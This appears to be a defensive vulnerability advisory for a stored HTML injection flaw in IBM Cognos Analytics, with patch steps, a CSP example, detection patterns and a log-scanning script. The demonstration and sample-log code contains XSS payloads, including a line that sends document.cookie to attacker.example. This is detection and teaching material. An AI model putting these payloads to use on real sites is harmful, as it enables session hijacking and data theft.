CVE-2024-41752

5.4 MEDIUM (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N)

📋 TL;DR

IBM Cognos Analytics is vulnerable to HTML injection: an authenticated remote attacker can store HTML that the application later renders without encoding, so it executes in the browser of any user who views it, within the security context of the Cognos site. This affects IBM Cognos Analytics versions 11.2.0-11.2.4 and 12.0.0-12.0.3, potentially allowing session hijacking, phishing, or data theft.

💻 Affected Systems

Products:
  • IBM Cognos Analytics
Versions: 11.2.0 through 11.2.4 and 12.0.0 through 12.0.3
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: The flaw is in the application's own rendering of user-supplied content, so every deployment within the affected version ranges is vulnerable regardless of configuration; only the vendor fix removes it.

📦 What is this software?

IBM Cognos Analytics is IBM's web-based business intelligence and reporting platform. Users author, share and view reports and dashboards through a browser, which is the surface this bug abuses.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete account takeover via session hijacking (where the session token is reachable from script), credential theft through an injected login or phishing form, or delivery of a malicious download to authenticated users who trust the Cognos site.

🟠

Likely Case

Session hijacking or actions performed in the victim's session, leading to unauthorized access to business intelligence data, or phishing attacks against authenticated users who view the injected content.

🟢

If Mitigated

With the vendor fix applied (output encoding in the affected rendering path) the injection no longer occurs. With only compensating controls (CSP, WAF, network restriction), residual impact is limited to content defacement or phishing text that renders without script execution.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: None known
Weaponized: UNKNOWN
Unauthenticated Exploit: No (CVSS PR:L: the attacker needs a valid Cognos login)
Complexity: LOW

Exploitation requires a victim to view the injected content (CVSS UI:R), and the attacker needs an account able to create or edit content that other users will open. No Cognos-specific technique is needed: HTML injection is well understood, and the scope-changed vector (S:C) reflects that the payload runs in the victim's browser rather than on the server.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: The fix pack or interim fix listed for your release in the IBM security bulletin below; the bulletin, not this page, is authoritative for the exact fix level.

Vendor Advisory: https://www.ibm.com/support/pages/node/7177223

Restart Required: Yes

Instructions:

1. Review the IBM security bulletin for the fix level that applies to your release.
2. Apply the appropriate fix pack or interim fix.
3. Restart the Cognos services.
4. Verify the fix, then confirm the reported version matches the bulletin.

🔧 Temporary Workarounds

Input Validation Enhancement

Platforms: all

The real fix is output encoding in the rendering path, and in a packaged product that ships only with the vendor patch. Until then, reduce the pool of potential attackers: because exploitation requires an authenticated account, restrict which accounts can create or edit content that other users open, and review shared content for unexpected markup.
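To make the distinction concrete, the following is an added example (not IBM Cognos code) showing the vulnerability class beside its fix: a user-controlled "report title" concatenated into HTML, the same template with context-appropriate output encoding, and a link renderer that also allow-lists the URL scheme, because encoding alone does not neutralise a `javascript:` href. The function names and payloads are assumptions constructed for the illustration.

```javascript
// Added example (not IBM Cognos code): HTML injection and its fix.
// A hypothetical user-controlled "report title" is rendered three ways.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encoder for HTML element content and quoted attribute values. Every
// character that can open or close markup is replaced, so the browser
// treats the whole value as text no matter what it contains.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ESCAPES[ch]);
}

// Vulnerable: the untrusted value is concatenated straight into markup.
function renderTitleUnsafe(title) {
  return `<h1 class="report-title">${title}</h1>`;
}

// Hardened: identical template, but the value is encoded for the HTML
// element context it lands in. Nothing is "filtered"; it is just text.
function renderTitleSafe(title) {
  return `<h1 class="report-title">${escapeHtml(title)}</h1>`;
}

// URL context needs an extra check: "javascript:alert(1)" survives HTML
// encoding untouched and runs when the link is followed, so the scheme is
// allow-listed first, then the value is encoded for the attribute.
function renderLinkSafe(href, label) {
  const safeHref = /^https?:\/\//i.test(href) ? href : '#';
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(label)}</a>`;
}

// Constructed payloads for the demonstration, not taken from the advisory.
const PAYLOAD = '<img src=x onerror="alert(document.cookie)">';
const BAD_URL = 'javascript:alert(1)';

console.log(renderTitleUnsafe(PAYLOAD)); // tag reaches the browser intact
console.log(renderTitleSafe(PAYLOAD));   // rendered as literal text
console.log(renderLinkSafe(BAD_URL, 'Quarterly')); // href replaced with "#"
```

The point for the workaround list above: the safe variant does not try to recognise "bad" input, which is why WAF-style pattern matching is only a stopgap. Encoding must also match the output context (element body, attribute, URL, script); one escaper does not cover all of them.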

Content Security Policy

Platforms: all

Send a Content-Security-Policy header (from the Cognos web tier or a reverse proxy in front of it) that restricts script sources and forbids inline script and inline event handlers; this blocks the execution half of the attack even if the markup is still injected. Deploy it in Report-Only mode first: a policy strict enough to matter will usually break parts of a rich web UI until its script origins are accounted for, and relaxing it with 'unsafe-inline' cancels the protection.
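As an added example, not taken from IBM or the bulletin, here is what the report-only-first rollout looks like on an nginx reverse proxy in front of the Cognos web tier. The upstream name, the report endpoint and the assumption that nginx fronts Cognos are all hypothetical; the directives themselves are standard nginx.

```nginx
# Added example, not from IBM. Assumes nginx is the reverse proxy in front
# of Cognos Analytics (upstream name and report path are assumptions).
location / {
    proxy_pass http://cognos_upstream;
    proxy_set_header Host $host;

    # Step 1: observe. Report-Only never blocks, so nothing breaks while you
    # learn which script origins and inline scripts the UI really needs.
    add_header Content-Security-Policy-Report-Only "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'self'; report-uri /csp-report" always;

    # Step 2: once reports are clean, rename the header to
    # Content-Security-Policy. Do not "fix" violations by adding
    # 'unsafe-inline' to script-src: injected <script> blocks and
    # onerror= handlers are exactly what that would re-enable.
}
```

The `frame-ancestors 'self'` directive also stops the Cognos UI being framed by another origin; if you legitimately embed Cognos in a portal, list that origin instead.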

🧯 If You Can't Patch

  • Implement web application firewall (WAF) rules to detect and block HTML injection attempts in content-creating requests; treat this as a stopgap, since markup can be URL-encoded, split across fields or use tags the rule set does not list
  • Restrict access to Cognos Analytics to trusted networks only and implement network segmentation; this does not remove the bug (the attacker is an authenticated user) but shrinks who can reach it

🔍 How to Verify

Check if Vulnerable:

Compare the installed Cognos Analytics version against the affected ranges: 11.2.0-11.2.4 or 12.0.0-12.0.3. A base version inside a range is vulnerable unless the fix pack or interim fix named in the IBM bulletin has been applied on top of it.

Check Version:

Check Cognos Configuration or the Administration console for the installed version and fix-pack level.

Verify Fix Applied:

Verify that the reported fix pack or interim fix level matches or exceeds the level IBM's security bulletin specifies for your release, and that the services were restarted after the fix was applied.

📡 Detection & Monitoring

Log Indicators:

  • Markup (tags, event-handler attributes, javascript: URLs) in content fields such as report, folder or dashboard names and descriptions, including URL-encoded forms
  • Repeated content-creation or edit requests from one account carrying varying markup, which is what an attacker probing for a rendering sink looks like

Network Indicators:

  • HTTP requests containing suspicious HTML/script patterns

SIEM Query:

source="cognos" AND ("<script" OR "%3Cscript" OR "javascript:" OR "onload=" OR "onerror=")

This is a literal keyword match: add the percent-encoded forms of each marker (as shown for "<script"), make the search case-insensitive if your platform is not by default, and expect noise from legitimate field names that happen to start with "on".
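Where the SIEM cannot decode request parameters, the normalisation can be done before indexing. The following is an added example, not part of the advisory and not an IBM tool, that scans constructed access-log lines from a proxy in front of Cognos: it URL-decodes the request target repeatedly (to catch double encoding) and then matches the same markers case-insensitively. Log format, paths and parameter names are assumptions.

```javascript
// Added example, not from IBM or the advisory. Scans web-server access-log
// lines for HTML-injection markers. It improves on a plain keyword search
// by percent-decoding the request (repeatedly, to catch double encoding)
// and matching case-insensitively.

const MARKERS = [
  /<\s*script/i,
  /<\s*(?:iframe|object|embed|svg|img|math)\b/i,
  /\bjavascript\s*:/i,
  /\bon[a-z]+\s*=/i, // onload=, onerror=, onmouseover= ... (noisy; tune)
];

// Decode percent-encoding until it stops changing (bounded), so
// %253Cscript -> %3Cscript -> <script is caught. Malformed sequences are
// left as-is rather than crashing the scanner.
function fullyDecode(s, maxRounds = 3) {
  let cur = s;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(cur.replace(/\+/g, ' ')); } catch { break; }
    if (next === cur) break;
    cur = next;
  }
  return cur;
}

// Minimal combined-log-format parser: enough to pull out the request line.
const LOG_RE = /^(\S+) \S+ (\S+) \[([^\]]+)\] "([A-Z]+) (\S+) [^"]*" (\d{3})/;

function scanLine(line) {
  const m = LOG_RE.exec(line);
  if (!m) return null;
  const [, ip, user, ts, method, target, status] = m;
  const decoded = fullyDecode(target);
  const hits = MARKERS.filter((re) => re.test(decoded)).map((re) => re.source);
  return hits.length ? { ip, user, ts, method, target, decoded, status, hits } : null;
}

function scanLog(text) {
  return text.split('\n').map(scanLine).filter(Boolean);
}

// Constructed sample lines (not real Cognos traffic). Line 2 is plainly
// malicious; line 3 is URL-encoded and would slip past a literal "<script"
// search; line 4 is double-encoded; lines 1 and 5 are benign.
const SAMPLE_LOG = [
  '10.0.0.5 - alice [12/Jan/2025:10:00:01 +0000] "GET /bi/v1/reports?name=Quarterly%20Sales HTTP/1.1" 200 5120',
  '10.0.0.9 - bob [12/Jan/2025:10:00:07 +0000] "GET /bi/v1/reports?name=<script>alert(1)</script> HTTP/1.1" 200 4096',
  '10.0.0.9 - bob [12/Jan/2025:10:00:09 +0000] "POST /bi/v1/objects?title=%3Cimg%20src%3Dx%20onerror%3Dfetch(%27http://attacker.example/%27%2Bdocument.cookie)%3E HTTP/1.1" 201 88',
  '10.0.0.9 - bob [12/Jan/2025:10:00:12 +0000] "GET /bi/v1/search?q=%253Cscript%253E HTTP/1.1" 200 2048',
  '10.0.0.5 - alice [12/Jan/2025:10:00:20 +0000] "GET /bi/v1/search?q=conversion%20rate HTTP/1.1" 200 2048',
].join('\n');

const findings = scanLog(SAMPLE_LOG);
for (const f of findings) {
  console.log(`${f.ts} ${f.ip} ${f.user} ${f.method} ${f.decoded} -> ${f.hits.join(', ')}`);
}
```

Two caveats a practitioner will hit immediately: access logs only carry the query string, so markup submitted in a POST body (the normal path for creating content) is invisible unless the proxy or the application logs bodies or field values; and the `on[a-z]+=` marker matches any parameter name beginning with "on", so baseline it against normal traffic before alerting on it.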

🔗 References